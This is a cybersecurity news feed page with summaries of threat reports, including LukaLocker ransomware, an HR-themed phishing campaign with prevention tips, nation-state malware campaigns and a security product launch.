CYBERSECURITY / DEFENSE / INTELLIGENCE

  • Cybersecurity researchers have discovered an updated variant of a known stealer malware that attackers affiliated with the Democratic People’s Republic of Korea (DPRK) have delivered as part of prior cyber espionage campaigns targeting job seekers. The artifact in question is an Apple macOS disk image (DMG) file named “MiroTalk.dmg” that mimics the legitimate video call service of the same name,

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The Volcano Demon group has been discovered spreading a new ransomware called LukaLocker, which targets Idealease Inc., a truck leasing company.

    The malware targets several security, monitoring, and backup services, including antivirus software like Trend Micro, Malware Bytes, Sophos, and McAfee.Β 

    The malware disables the service if any of these are found on the machine.  

    In recent weeks, Volcano Demon has been claimed to have carried out several profitable cybercrime attacks. It specifically targets the industrial and logistic sectors.

    Particularly, the leadership of the victim organization is intimidated and negotiated for payments by the group over the phone.

    Are you from SOC/DFIR Teams? -Β Sign up for a free ANY.RUN account!Β to Analyse Advanced Malware Files

    Behaviors Spotted in the Attack 

    The malware is coded in C++ and is presented as an x64 binary.  By using dynamic API resolution and API obfuscation to conceal its destructive capabilities, the LukaLocker ransomware avoids detection, analysis, and reverse engineering.

    A command prompt window that opens when the malware is executed displays a list of the processes that it tries to terminate.

    After this operation is completed, the system encrypts files and appends “.NBA” to their filenames. It then saves readme.txt to the desktop.Β 

    β€œYour corporate network has been encrypted. And that’s not all – we studied and downloaded a lot of your data, many of these have confidential status”, reads the ransom note.

    Ransom Note

    In this case, the ransom note specifies that to retrieve files, you must speak with the operator via the qTox encrypted chat client. An instant chat app called qTox is designed to avoid government surveillance.

    β€œVarious security, monitoring and backup services are targeted.Β  This includes antivirus software such as Malware Bytes, Sophos, McAfee and Trend Micro”, reads the SonicWall threats research report.

    β€œIf any of these are present on the system, the service is disabled by the malware”.

    Volcano Group LukaLocker Ransomware
    List of security and backup services to stop

    The Volcano Demon operators usually encrypt the data of their victims before reaching out to them. The gang then notifies its victims that their files have been effectively compromised by leaving a ransom note.

    After then, the attackers will begin pushing their victims into complying with their requests to commence their extortion scheme. These threat actors will threaten to tell clients and partners and carry out more attacks if their victims don’t address the problem.

    The actors would also threaten to sell the employees’ and clients’ data to scammers if the infiltrated organizations don’t comply.

    Ransomware operators are shifting their tactics; recently, a large number of new threat actors have emerged and begun targeting different types of enterprises.

    Businesses should strengthen their security protocols since malicious actors will always find new ways to get into networks and steal information.

    “Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!”-Β Free Demo

    The post Volcano Demon Group Attacking Organizations With LukaLocker Ransomware appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Quick take:

    • Harmony is the fourth cybersecurity application Resonance developed to address the disconnect in cybersecurity practices.
    • Harmony captures continuous snapshots of the web state including DNS records and scripts.
    • It also utilises artificial intelligence to assess results and eliminate false positives, thus minimising research work for both the customer and the Resonance incident response team.

    Resonance, a full-spectrum cybersecurity firm building security solutions for Web2 and Web3 apps has launched Harmony.

    The asset monitoring tool allows IT teams, organisations, startups and entrepreneurs to make strong detective and preventive measures accessible at any technical level. 

    This is Resonance’s fourth in-house cybersecurity application. It is part of the security firm’s tech stack of more than 30 integrated tools into one platform to focus on end-to-end, β€œfull spectrum” cybersecurity.

    The launch comes just two months after Resonance raised $1.5 million in pre-seed funding as it seeks to address the root cause of cybersecurity breaches across both Web2 and Web3 including CDN Hijacking, BGP Hijacking, and DNS manipulation.

    According to a report by Web3 bug bounty platform Immunefi, most exploits that Web3 projects and non-Web3 institutions face target traditional Web2 infrastructure, with 46.5% of all hacks in 2022 in monetary terms supporting this argument.

    Software reviews and education company, G2 also estimates that every organisation faces about 7.5 DNS attacks a year, leading to application outages in 82% of businesses with 29% of those cases resulting in data theft.

    Because exploits targeting dApps attack the Web2 infrastructure that dApps connect to, including domain name systems, routing tables that direct web traffic, and content delivery networks, weaknesses in these Web2 systems can still cause vulnerabilities even when dApps are built securely.

    Harmony addresses this vulnerability by capturing continuous snapshots of the web state, including DNS records and scripts. The tool also utilises AI to assess results and eliminate false positives, thus minimising research work for both the customer and the Resonance incident response team.

    β€œReleasing this new tool demonstrates Resonance’s dedication to a research-driven cybersecurity approach. The goal is to keep any organization’s cybersecurity strategies in tune with continuously evolving cyberattacks.

    This highly effective monitoring and prevention tool is a game changer for projects trying to avoid DNS takeovers and keep their sensitive assets from being exposed to black-hat hacking groups,” Resonance founder and CEO Charles Dray shared in a statement.

    The post Resonance Launches Harmony to Monitor and Detect Threats to Web2 and Web3 Apps appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Attacks on your network are often meticulously planned operations launched by sophisticated threats. Sometimes your technical fortifications provide a formidable challenge, and the attack requires assistance from the inside to succeed. For example, in 2022, the FBI issued a warning1 that SIM swap attacks are growing: gain control of the phone and earn a gateway to email, bank accounts, stocks,

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The financially motivated threat actor known as FIN7 has been observed using multiple pseudonyms across several underground forums to likely advertise a tool known to be used by ransomware groups like Black Basta. “AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Phishing attacks are becoming increasingly sophisticated, and the latest strategy targeting employees highlights this evolution.

    This new phishing attempt impersonates a company’s Human Resources (HR) department, presenting a significant threat to corporate security.

    In this article, we’ll dissect the recent phishing tactic and provide detailed insights to help you recognize and avoid falling victim to such scams.

    The Deceptive Email: A Closer Look

    According to the Cofense reports, a phishing email is meticulously designed to look like official communication from a company’s HR department.

    It arrives in employees’ inboxes with a subject line that immediately grabs attention: β€œModified Employee Handbook For All Employees – Kindly Acknowledge.”

    This subject line creates a sense of urgency, prompting recipients to open the email and engage with its contents without hesitation.

    The email’s layout and language further enhance its perceived legitimacy.

    It opens with a formal greeting and presents a message in a structured format typical of corporate communications.

    The language used is professional, clear, and direct, mimicking the tone and style that employees would expect from an HR department.

    Are you from SOC/DFIR Teams? - Sign up for a free ANY.RUN account! to Analyse Advanced Malware Files

    The body of the email includes formal language and directives typical for corporate communications.

    It begins with a polite greeting and swiftly transitions into a directive to review a revised employee handbook.

    The email stresses the importance of compliance by a specific deadline, typically by the end of the day, fostering a sense of urgency and importance among recipients.

    The Phishing Page: A Deceptive Trap

    The primary goal of this phishing email isΒ to lure recipients into clicking on the embedded hyperlink andΒ trick them into entering their credentials on a fake login page.

    By appearing to originate from a trusted source (HR department), the email leverages authority and urgency to persuade recipients to take immediate action without questioning the authenticity of the request.

    Phishing Page

    The email contains a hyperlink with the heading, β€œHR COMPLIANCE SECTION FOR REVISED EMPLOYEE HANDBOOK.”

    Clicking on this link takes you to a page that mimics a legitimate document hosting site. Here, you are presented with a β€œPROCEED” button to continue.

    Upon clicking the β€œPROCEED” button, you are redirected to a page that appears to be branded by Microsoft.

    This is where the phishing attack becomes more sophisticated.

    The page asks for your Microsoft username and looks very convincing.

    The threat actor’s strategy is to gain your trust by presenting a legitimate-looking website where you are prompted to log in with your company’s Microsoft credentials.

    Here’s a detailed breakdown of what happens next:

    1. Capture of Credentials: When you enter your company email address and press next, you are redirected to what looks like your company’s Microsoft Office 365 login page.
    2. Error Message: After entering your username and potentially your password, you receive an error message stating, β€œThere was an unexpected internal error. Please try again.” This message is a ruse.
    3. Redirection to Legitimate Login Page: You are then redirected to your actual company’s SSO/Okta login page, and the victim will likely not even realize the URL changed. In the meantime, the threat actor has captured your username and password from the login attempt.

    To protect yourself and your organization from such sophisticated phishing attacks, it is crucial to stay vigilant and follow these preventive measures:

    • Verify the Source: Always verify the sender’s email address and look for any inconsistencies.
    • Hover Over Links: Before clicking on any link, hover over it to see the actual URL.
    • Report Suspicious Emails: Immediately report any suspicious emails to your IT department.
    • Regular Training: Participate in regular cybersecurity training sessions to stay updated on the latest phishing tactics.

    By staying informed and vigilant, employees can play a crucial role in safeguarding their organization against these evolving phishing threats.

    "Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!"- Free Demo

    The post Beware! of New Phishing Tactics Mimic as HR Attacking Employees appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • A China-linked threat actor called APT17 has been observed targeting Italian companies and government entities using a variant of a known malware referred to as 9002 RAT. The two targeted attacks took place on June 24 and July 2, 2024, Italian cybersecurity company TG Soft said in an analysis published last week. “The first campaign on June 24, 2024 used an Office document, while the second

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The infamous cybercrime group known as Scattered Spider has incorporated ransomware strains such as RansomHub and Qilin into its arsenal, Microsoft has revealed. Scattered Spider is the designation given to a threat actor that’s known for its sophisticated social engineering schemes to breach targets and establish persistence for follow-on exploitation and data theft. It also has a history of

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Threat actors are actively exploiting a recently disclosed critical security flaw impacting Apache HugeGraph-Server that could lead to remote code execution attacks. Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API. “Users are

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ